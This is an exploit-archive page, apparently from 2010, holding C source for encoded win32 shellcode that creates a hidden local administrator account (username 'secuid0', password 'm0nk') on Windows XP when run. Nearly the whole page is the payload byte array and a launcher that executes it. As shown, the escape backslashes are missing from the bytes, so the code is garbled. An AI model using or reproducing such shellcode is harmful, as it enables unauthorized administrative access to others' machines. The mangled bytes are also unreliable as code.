generic win32 - add new local administrator 326 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : generic win32 - add new local administrator 326 bytes
# Published : 2010-10-04
# Author :
# Previous Title : w32-speaking-shellcode
# Next Title : Windows XP PRO SP3 - Full ROP calc shellcode

/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] =
"xdaxdexd9x74x24xf4xb8x22xd2x27x7ax29xc9xb1x4b"
"x5bx31x43x1ax83xebxfcx03x43x16xe2xd7x3bxbcx7a"
"x17xbcx95x4bxd7xd8x92xecxe7xa5x65x94x08x2dx25"
"x69x9dx41xbaxdcx2axe1xcaxf7x25xe2xcax07xbexa2"
"xfex8ax80x5ex74xd4x3cxc1x49xb5xb7x91x69x12x4c"
"x2cx4exd1x06xaaxd6xe4x4cx3fx6cxffx1bx1ax51xfe"
"xf0x78xa5x49x8dx4bx4dx48x7fx82xaex7axbfx19xfc"
"xf9xffx96xfaxc0x30x5bx04x04x25x90x3dxf6x9dx71"
"x37xe7x56xdbx93xe6x83xbax50xe4x18xc8x3dxe9x9f"
"x25x4ax15x14xb8xa5x9fx6ex9fx29xc1xadx72x01x53"
"xd9x27x5dxacxe6xb1xa5xd2xdcxcaxa9xd4xdcx4bx6e"
"xd0xdcx4bx71xe0x12x3ex97xd1x42xd8x57xd6x92x43"
"xa9x5cx9cx0dx8ex83xd3x70xc2x4cx13x73x1bxc4xf6"
"x9bx43x29x07xa4xfdx17x1cxb9xa0x1ax9fx3axd4xd4"
"xdex82xeex16xe0x04x07xa0x1fxfbx28x26xd1x5fxe6"
"x79xbdx0cxf7x2fx39x82xc7x80xbexb1xcfxc8xadxc5"
"x2fxf7x4ex57xb4x26xf5xdfx51x17xdax7cxbax39x41"
"xf7x9axb0xfax92xa8x1ax8fx39x2ex2ex06xa6x80xf0"
"xb5x16x8fx9bx65x78x2ex38x01xa6x96xe6xe9xc8xb3"
"x92xc9x78x53x38x68xedxccxccx05x98x62x11xb8x06"
"xeex38x54xaex83xcexdax51x10x40x68xe1xf8xedxe9"
"x66x8cx78x95x58x4ex54x34xfdxeaxaa";

int main(int argc, char **argv)
{
	((void (*)())code)();
	printf("New local admin tUsername: secuid0ntttPassword: m0nk");
	return 0;
}